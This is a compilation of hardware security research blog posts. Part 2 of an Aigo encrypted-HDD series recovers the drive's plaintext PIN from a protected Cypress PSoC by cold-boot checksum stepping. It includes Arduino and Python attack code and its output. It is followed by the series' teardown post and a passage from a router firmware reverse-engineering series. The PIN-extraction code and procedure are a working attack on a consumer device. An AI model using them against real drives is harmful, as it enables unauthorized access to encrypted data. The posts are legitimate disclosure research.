  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentationUS Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADDMOV A,XPUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (AXSP and PC).

In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = 0
    write_reg(0xF3, i&0xFF)      # X = 0
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual give us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();
  1. It reads the checkum_delay
  2. Starts computing the checkum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicrosecondsdoing non-sense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

Aigo Chinese encrypted HDD − Part 1: taking it apart

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

Introduction

Analyzing and breaking external encrypted HDD has been a “hobby” of mine for quite some time. With my colleagues Joffrey Czarny and Julien Lenoir we looked at several models in the past:

  • Zalman VE-400
  • Zalman ZM-SHE500
  • Zalman ZM-VE500

Here I am going to detail how I had fun with one drive a colleague gave me: the Chinese Aigo “Patriot” SK8671, which follows the classical design for external encrypted HDDs: a LCD for information diplay and a keyboard to enter the PIN.

DISCLAIMER: This research was done on my personal time and is not related to my employer.

Patriot HDD front view with keyboard Patriot HDD package
Enclosure
Packaging

The user must input a password to access data, which is supposedly encrypted.

Note that the options are very limited:

  • the PIN can be changed by pressing F1 before unlocking
  • the PIN must be between 6 and 9 digits
  • there is a wrong PIN counter, which (I think) destroys data when it reaches 15 tries.

In practice, F2, F3 and F4 are useless.

Hardware design

Of course one of the first things we do is tear down everything to identify the various components.

Removing the case is actually boring, with lots of very small screws and plastic to break.

In the end, we get this (note that I soldered the 5 pins header):

disk

Main PCB

The main PCB is pretty simple:

main PCB

Important parts, from top to bottom:

  • connector to the LCD PCB (CN1)
  • beeper (SP1)
  • Pm25LD010 (datasheet) SPI flash (U2)
  • Jmicron JMS539 (datasheet) USB-SATA controller (U1)
  • USB 3 connector (J1)

The SPI flash stores the JMS539 firmware and some settings.

LCD PCB

The LCD PCB is not really interesting:

LCD view

LCD PCB

It has:

  • an unknown LCD character display (with Chinese fonts probably), with serial control
  • a ribbon connector to the keyboard PCB

Keyboard PCB

Things get more interesting when we start to look at the keyboard PCB:

Keyboard PCB, back

Here, on the back we can see the ribbon connector and a Cypress CY8C21434 PSoC 1 microcontroller (I’ll mostly refer to it as “µC” or “PSoC”):CY8C21434

The CY8C21434 is using the M8C instruction set, which is documented in the Assembly Language User Guide.

The product page states it supports CapSense, Cypress’ technology for capacitive keyboards, the technology in use here.

You can see the header I soldered, which is the standard ISSP programming header.

Following wires

It is always useful to get an idea of what’s connected to what. Here the PCB has rather big connectors and using a multimeter in continuity testing mode is enough to identify the connections:

hand drawn schematic

Some help to read this poorly drawn figure:

  • the PSoC is represented as in the datasheet
  • the next connector on the right is the ISSP header, which thankfully matches what we can find online
  • the right most connector is the clip for the ribbon, still on the keyboard PCB
  • the black square contains a drawing of the CN1 connector from the main PCB, where the cable goes to the LCD PCB. P11, P13 and P4 are linked to the PSoC pins 11, 13 and 4 through the LCD PCB.

Attack steps

Now that we know what are the different parts, the basic steps would be the same as for the drives analyzed in previous research :

  • make sure basic encryption functionnality is there
  • find how the encryption keys are generated / stored
  • find out where the PIN is verified

However, in practice I was not really focused on breaking the security but more on having fun. So, I did the following steps instead:

  • dump the SPI flash content
  • try to dump PSoC flash memory (see part 2)
  • start writing the blog post
  • realize that the communications between the Cypress PSoC and the JMS539 actually contains keyboard presses
  • verify that nothing is stored in the SPI when the password is changed
  • be too lazy to reverse the 8051 firmware of the JMS539
  • TBD: finish analyzing the overall security of the drive (in part 3 ?)

Dumping the SPI flash

Dumping the flash is rather easy:

  • connect probes to the CLKMOSIMISO and (optionally) EN pins of the flash
  • sniff the communications using a logic analyzer (I used a Saleae Logic Pro 16)
  • decode the SPI protocol and export the results in CSV
  • use decode_spi.rb to parse the results and get a dump

Note that this works very well with the JMS539 as it loads its whole firmware from flash at boot time.

$ decode_spi.rb boot_spi1.csv dump
0.039776 : WRITE DISABLE
0.039777 : JEDEC READ ID
0.039784 : ID 0x7f 0x9d 0x21
---------------------
0.039788 : READ @ 0x0
0x12,0x42,0x00,0xd3,0x22,0x00,
[...]
$ ls --size --block-size=1 dump
49152 dump
$ sha1sum dump
3d9db0dde7b4aadd2b7705a46b5d04e1a1f3b125  dump

Unfortunately it does not seem obviously useful as:

  • the content did not change after changing the PIN
  • the flash is actually never accessed after boot

So it probably only holds the firmware for the JMicron controller, which embeds a 8051 microcontroller.

Sniffing communications

One way to find which chip is responsible for what is to check communications for interesting timing/content.

As we know, the USB-SATA controller is connected to the screen and the Cypress µC through the CN1 connector and the two ribbons. So, we hook probes to the 3 relevant pins:

  • P4, generic I/O in the datasheet
  • P11, I²C SCL in the datasheet
  • P13, I²C SDA in the datasheet

probes

We then launch Saleae logic analyzer, set the trigger and enter “123456✓” on the keyboard. Which gives us the following view:

Saleae logic analyzer screenshot

You can see 3 differents types of communications:

  • on the P4 channel, some short bursts
  • on P11 and P13, almost continuous exchanges

Zooming on the first P4 burst (blue rectangle in previous picture), we get this :

P4 zoom

You can see here that P4 is almost 70ms of pure regular signal, which could be a clock. However, after spending some time making sense of this, I realized that it was actually a signal for the “beep” that goes off every time a key is touched… So it is not very useful in itself, however, it is a good marker to know when a keypress was registered by the PSoC.

However, we have on extra “beep” in the first picture, which is slightly different: the sound for “wrong pin” !

Going back to our keypresses, when zooming at the end of the beep (see the blue rectangle again), we get:end of beep zoom

Where we have a regular pattern, with a (probable) clock on P11 and data on P13. Note how the pattern changes after the end of the beep. It could be interesting to see what’s going on here.

2-wires protocols are usually SPI or I²C, and the Cypress datasheet says the pins correspond to I²C, which is apparently the case:i2c decoding of '1' keypress

The USB-SATA chipset constantly polls the PSoC to read the key state, which is ‘0’ by default. It then changes to ‘1’ when key ‘1’ was pressed.

The final communication, right after pressing “✓”, is different if a valid PIN is entered. However, for now I have not checked what the actual transmission is and it does not seem that an encryption key is transmitted.

Anyway, see part 2 to read how I did dump the PSoC internal flash.

Practical Reverse Engineering Part 5 — Digging Through the Firmware

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In part 4 we extracted the entire firmware from the router and decompressed it. As I explained then, you can often get most of the firmware directly from the manufacturer’s website: Firmware upgrade binaries often contain partial or entire filesystems, or even entire firmwares.

In this post we’re gonna dig through the firmware to find potentially interesting code, common vulnerabilities, etc.

I’m gonna explain some basic theory on the Linux architecture, disassembling binaries, and other related concepts. Feel free to skip some of the parts marked as [Theory]; the real hunt starts at ‘Looking for the Default WiFi Password Generation Algorithm’. At the end of the day, we’re just: obtaining source code in case we can use it, using grep and common sense to find potentially interesting binaries, and disassembling them to find out how they work.

One step at a time.

Gathering and Analysing Open Source Components

GPL Licenses — What They Are and What to Expect [Theory]

Linux, U-Boot and other tools used in this router are licensed under the General Public License. This license mandates that the source code for any binaries built with GPL’d projects must be made available to anyone who wants it.

Having access to all that source code can be a massive advantage during the reversing process. The kernel and the bootloader are particularly interesting, and not just to find security issues.

When hunting for GPL’d sources you can usually expect one of these scenarios:

  1. The code is freely available on the manufacturer’s website, nicely ordered and completely open to be tinkered with. For instance: apple products or theamazon echo
  2. The source code is available by request
    • They send you an email with the sources you requested
    • They ask you for “a reasonable amount” of money to ship you a CD with the sources
  3. They decide to (illegally) ignore your requests. If this happens to you, consider being nice over trying to get nasty.

In the case of this router, the source code was available on their website, even though it was a huge pain in the ass to find; it took me a long time of manual and automated searching but I ended up finding it in the mobile version of the site:

ls -lh gpl_source

But what if they’re hiding something!? How could we possibly tell whether the sources they gave us are the same they used to compile the production binaries?

Challenges of Binary Verification [Theory]

Theoretically, we could try to compile the source code ourselves and compare the resulting binary with the one we extracted from the device. In practice, that is extremely more complicated than it sounds.

The exact contents of the binary are strongly tied to the toolchain and overall environment they were compiled in. We could try to replicate the environment of the original developers, finding the exact same versions of everything they used, so we can obtain the same results. Unfortunately, most compilers are not built with output replicability in mind; even if we managed to find the exact same version of everything, details like timestamps, processor-specific optimizations or file paths would stop us from getting a byte-for-byte identical match.

If you’d like to read more about it, I can recommend this paper. The authors go through the challenges they had to overcome in order to verify that the official binary releases of the application ‘TrueCrypt’ were not backdoored.

Introduction to the Architecture of Linux [Theory]

In multiple parts of the series, we’ve discussed the different components found in the firmware: bootloader, kernel, filesystem and some protected memory to store configuration data. In order to know where to look for what, it’s important to understand the overall architecture of the system. Let’s quickly review this device’s:

Linux Architecture

The bootloader is the first piece of code to be executed on boot. Its job is to prepare the kernel for execution, jump into it and stop running. From that point on, the kernel controls the hardware and uses it to run user space logic. A few more details on each of the components:

  1. Hardware: The CPU, Flash, RAM and other components are all physically connected
  2. Linux Kernel: It knows how to control the hardware. The developers take the Open Source Linux kernel, write drivers for their specific device and compile everything into an executable Kernel. It manages memory, reads and writes hardware registers, etc. In more complex systems, “kernel modules” provide the possibility of keeping device drivers as separate entities in the file system, and dynamically load them when required; most embedded systems don’t need that level of versatility, so developers save precious resources by compiling everything into the kernel
  3. libc (“The C Library”): It serves as a general purpose wrapper for the System Call API, including extremely common functions like printfmalloc or system. Developers are free to call the system call API directly, but in most cases, it’s MUCH more convenient to use libc. Instead of the extremely common glibc (GNU C library) we usually find in more powerful systems, this device uses a version optimised for embedded devices: uClibc.
  4. User Applications: Executable binaries in /bin/ and shared objects in /lib/(libraries that contain functions used by multiple binaries) comprise most of the high-level logic. Shared objects are used to save space by storing commonly used functions in a single location

Bootloader Source Code

As I’ve mentioned multiple times over this series, this router’s bootloader is U-Boot. U-Boot is GPL licensed, but Huawei failed to include the source code in their website’s release.

Having the source code for the bootloader can be very useful for some projects, where it can help you figure out how to run a custom firmware on the device or modify something; some bootloaders are much more feature-rich than others. In this case, I’m not interested in anything U-Boot has to offer, so I didn’t bother following up on the source code.

Kernel Source Code

Let’s just check out the source code and look for anything that might help. Remember the factory reset button? The button is part of the hardware layer, which means the GPIO pin that detects the button press must be controlled by the drivers. These are the logs we saw coming out of the UART port in a previous post:

UART system restore logs

With some simple grep commands we can see how the different components of the system (kernel, binaries and shared objects) can work together and produce the serial output we saw:

System reset button propagates to user space

Having the kernel can help us find poorly implemented security-related algorithms and other weaknesses that are sometimes considered ‘accepted risks’ by manufacturers. Most importantly, we can use the drivers to compile and run our own OS on the device.

User Space Source Code

As we can see in the GPL release, some components of the user space are also open source, such as busybox and iptables. Given the right (wrong) versions, public vulnerability databases could be enough to find exploits for any of these.

